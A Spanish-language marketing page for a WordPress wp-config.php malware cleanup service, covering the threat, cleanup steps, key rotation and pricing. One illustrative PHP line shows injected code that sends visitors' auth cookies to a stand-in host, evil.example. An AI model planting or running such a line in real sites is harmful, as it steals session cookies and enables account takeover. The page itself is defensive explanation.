PHARMA HACK · WORDPRESS · LIMPIADO
wp-config.php malware cleanup.
wp-config.php se ejecuta en cada carga de página de WordPress, por eso lo aman los atacantes. Quitamos la inyección, rotamos las claves y le decimos a qué tenía acceso el atacante. Tarifa única 279 $.
MECANISMO
wp-config.php es el peor sitio para que un atacante plante código.
wp-config.php se carga en cada petición de WordPress, antes de que WordPress pueda filtrar nada. Un atacante que modifique ese archivo puede ejecutar código en cada página, capturar cada login o añadir admins ocultos que no aparecen en el panel.
En cuanto wp-config.php ha sido tocado, sus salts, contraseña de base de datos y claves de autenticación deben considerarse comprometidos. Rotamos todo como parte de la limpieza, no como un extra.
01 02 // Legitimate wp-config starts with constants. 03 define('DB_NAME', 'wp_database'); 04 05 // Injected — sends auth cookies to attacker on every request: 06 @file_get_contents("http://evil.example/c?d=" . $_COOKIE);
What I remove
Cada línea, cada clave, cada cuenta.
-
TRIAGE DE PLUGINS
wp-config.php comparado línea a línea con una base limpia. Se revisa cada línea no estándar.
-
WP-CONFIG
Código inyectado eliminado. Líneas include/require sospechosas que apuntan a archivos desconocidos — auditadas y eliminadas.
-
CLAVES
AUTH_KEY, SECURE_AUTH_KEY, LOGGED_IN_KEY, NONCE_KEY y sus salts rotados. Todas las sesiones invalidadas.
-
BASE DE DATOS
Usuarios admin ocultos eliminados. Payloads autoloaded de wp_options auditados en busca de persistencia relacionada.
-
ENDURECIMIENTO
Permisos de wp-config.php endurecidos. Reglas .htaccess y Nginx añadidas para denegar el acceso directo.
-
INFORME
Informe forense en lenguaje claro: a qué tenía acceso el atacante, qué se rotó, qué le queda por hacer.
Precios
Cleanup
$279
flat, one-time, per site
Manual cleanup, entry-vector identification, written forensic report.
Iniciar limpiezaMonitoring
$29 / mo
per site, cancel any time
Monitorización continua, endurecimiento, una limpieza al año incluida.
ProtégetePart of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.
Ver todos los servicios →Correo [email protected] or use the contact form.